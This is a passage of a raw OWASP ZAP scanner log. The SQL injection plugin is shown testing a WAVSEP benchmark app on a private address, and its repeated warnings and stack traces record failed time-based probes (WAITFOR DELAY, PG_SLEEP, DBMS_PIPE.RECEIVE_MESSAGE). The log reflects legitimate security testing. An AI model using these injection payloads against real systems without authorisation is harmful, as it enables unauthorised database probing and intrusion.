org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680705 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680705 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680706 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680707 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680708 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680708 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(121)||CHR(121)||CHR(108),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(121)||CHR(121)||CHR(108),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680709 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(82)||CHR(86)||CHR(82),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(82)||CHR(86)||CHR(82),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680710 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680710 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(105)||CHR(75),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(105)||CHR(75),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680711 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680712 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680712 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(118)||CHR(76)||CHR(77),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(118)||CHR(76)||CHR(77),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680713 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 